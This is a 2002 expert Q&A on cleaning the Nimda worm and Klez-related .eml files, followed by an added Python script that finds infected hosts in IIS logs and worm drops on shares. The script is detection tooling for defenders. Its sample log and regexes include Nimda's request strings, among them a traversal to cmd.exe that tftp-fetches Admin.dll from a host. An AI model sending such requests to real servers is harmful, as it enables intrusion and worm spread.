Ask the Expert

Cleaning Nimda and identifying .eml file

The Nimda virus has infected my network. Norton Antivirus states that it only is placing the file in quarantine and not cleaning the virus. I also get numerous files with the same name and the suffix .eml on all of my servers. Is there any way I can trace where the virus is coming from? How do I get rid of it completely?


I feel your pain. Here are a few points first before I answer:

  • Antivirus should be running on all desktops and servers with logging.
  • Both desktop and server installs should be locked to only your specifications.
  • These installs should report all viruses to the main console or site.
  • Company policy should dictate no use of removable media from outside the company without first scanning it.
  • Viruses should be deleted!!! Yes, delete them so as NOT to spread them.
  • If these procedures were in place, you would know when and if a virus hits your network. The logging/alerts would be sent to you, and then you would know where they are arriving into your network.

    Okay, now let's see if I can answer you:

  • Change the Norton configuration to "delete" all viruses and clean. Change every desktop and server in the company, no matter the length of time to accomplish this. I know one company that did all 10,000 desktops and servers in a weekend simply because they did not have remote management. It was that important due to loss of hours and data.

  • Check the patch levels of all Microsoft devices (OS, IIS, SQL, Exchange). Microsoft reports that if all your systems are patched, Nimda should die quickly.

  • Your .eml problem may be an aliases problem related to the following: Klez (F-Secure), TROJ_KLEZ.C (Trend), W32.Klez.D@mm (NAV), W32/Klez (Panda), W32/Klez.a@MM, W32/Klez.b@MM, W32/Klez.eml, W32/Klez@MM, Win32.Klez.D@mm (AVX)

  • Check www.mcafee.com for references to each of these. Here are specific instructions from McAfee:

    Removing the .eml threat requires patching vulnerable systems, disabling network shares, and using the latest DAT files. It cannot be removed manually.

    Infected systems must:
    - Apply the patches
    - Close any network shares prior to cleaning
    - Exit any running applications
    - Stop a running IIS server
    - Scan and clean each drive
    - Restore the RICHED20.DLL and MMC.EXE files if they were overwritten by the virus and deleted by the scanner.

  • You may need to do further work on the .eml issue. It may or may not be Nimda related. Since I do not have first-hand access to your systems and have not seen the logs or reports, I can only assume facts.

    Good luck!!


    This was first published in March 2002
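    On the "where is it coming from" part of the question, the answer above relies on antivirus alerts. When those were never configured, the IIS logs and the share drops are what is left. The following Python script is an added example, not part of the original answer and not McAfee's or Symantec's tooling. It assumes IIS W3C extended logging with the standard field names (c-ip, cs-uri-stem, cs-uri-query); the request signatures (root.exe, directory traversal to cmd.exe, the tftp fetch of Admin.dll) are the ones documented for Nimda in CERT advisory CA-2001-26; the log lines and file contents are constructed samples. The .eml/.nws check keys on the worm's own MIME copy (an audio/x-wav part that is really readme.exe), so a user's legitimately saved mail ending in .eml is not flagged, and the web-page check reads the tail of each file because Nimda appends its readme.eml loader at the end.

```python
"""Nimda triage helpers (added example; not from the original answer). Finds which
hosts are probing IIS in W3C logs and which files on a share are the worm's drops."""
import os
import re

# Request shapes Nimda sends to IIS (CERT CA-2001-26), most severe first: the tftp
# fetch of Admin.dll (the worm body), the Code Red II root.exe backdoor, traversal to cmd.exe.
PROBE_KINDS = (
    ("upload", re.compile(r"tftp|admin\.dll", re.I)),
    ("backdoor", re.compile(r"/root\.exe", re.I)),
    ("traversal", re.compile(r"/winnt/system32/cmd\.exe", re.I)),
)
# Loader Nimda appends to .htm/.html/.asp files so browsers fetch readme.eml.
INJECT_RE = re.compile(r'window\.open\(\s*"readme\.eml"', re.I)
# Dropped .eml/.nws files are the worm's own MIME message: an audio/x-wav part
# that is really readme.exe (the MS01-020 MIME-header bug).
DROP_SUFFIXES = (".eml", ".nws")
DROP_MARKERS = (b"audio/x-wav", b"readme.exe")

def parse_w3c(lines):
    """Yield one dict per IIS W3C log record, mapping columns via the #Fields: header."""
    fields = None
    for line in lines:
        line = line.rstrip("\r\n")
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#") and fields:
            values = line.split(" ")
            if len(values) == len(fields):  # skip malformed records
                yield dict(zip(fields, values))

def classify_request(stem, query):
    """Return the Nimda probe kind for one request, or None if it looks normal."""
    target = stem + "?" + ("" if query == "-" else query)
    for kind, pattern in PROBE_KINDS:
        if pattern.search(target):
            return kind
    return None

def summarize_probes(lines):
    """Map each probing client IP to hit count, first-seen time and probe kinds,
    noisiest host first: that is the infected machine to pull off the wire."""
    report = {}
    for rec in parse_w3c(lines):
        kind = classify_request(rec.get("cs-uri-stem", ""), rec.get("cs-uri-query", "-"))
        if kind is None:
            continue
        entry = report.setdefault(rec.get("c-ip", "?"),
                                  {"count": 0, "first_seen": None, "kinds": set()})
        entry["count"] += 1
        entry["kinds"].add(kind)
        stamp = rec.get("date", "") + " " + rec.get("time", "")
        if entry["first_seen"] is None or stamp < entry["first_seen"]:
            entry["first_seen"] = stamp
    return dict(sorted(report.items(), key=lambda kv: -kv[1]["count"]))

def classify_file(name, sample):
    """Label a file from its name and a byte sample (head plus tail): 'dropped' for the
    worm's MIME copy, 'injected' for a page carrying the loader, None otherwise."""
    lower = name.lower()
    if lower.endswith(DROP_SUFFIXES) and all(m in sample for m in DROP_MARKERS):
        return "dropped"
    if lower.endswith((".htm", ".html", ".asp")) and INJECT_RE.search(sample.decode("latin-1")):
        return "injected"
    return None

def read_sample(path, chunk=4096):
    """First and last `chunk` bytes: MIME headers sit at the top, the appended loader at the bottom."""
    with open(path, "rb") as fh:
        head = fh.read(chunk)
        fh.seek(0, os.SEEK_END)
        fh.seek(max(fh.tell() - chunk, 0))
        return head + fh.read(chunk)

def scan_tree(root):
    """Walk a directory (e.g. a mapped share) and list suspect files by label."""
    found = {"dropped": [], "injected": []}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                label = classify_file(name, read_sample(path))
            except OSError:
                continue
            if label:
                found[label].append(path)
    return found

# Constructed sample log (not real traffic); IIS writes "-" when the query string is empty.
SAMPLE_LOG = """#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2001-09-18 13:00:01 10.1.2.33 GET /scripts/root.exe /c+dir 404
2001-09-18 13:00:02 10.1.2.33 GET /scripts/..%255c../winnt/system32/cmd.exe /c+dir 200
2001-09-18 13:00:03 10.1.2.33 GET /scripts/..%255c../winnt/system32/cmd.exe /c+tftp%20-i%2010.1.2.33%20GET%20Admin.dll 200
2001-09-18 13:01:10 10.1.7.5 GET /default.htm - 200
2001-09-18 13:02:15 10.1.9.14 GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe /c+dir 404
""".splitlines()
```

    Run summarize_probes over each server's log directory (the W3C logs under the IIS LogFiles folder) and the IP at the top of the report, the one whose first-seen time is earliest, is the host that is already infected and seeding the others; a 200 on the cmd.exe or tftp request means that server took the hit as well. scan_tree on a mapped share lists what the worm dropped, nothing more: it does not delete, and it does not replace the RICHED20.DLL or MMC.EXE copies the McAfee instructions above mention, so it is a way to find the sources and scope the cleanup, not a substitute for the scan-and-clean pass.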
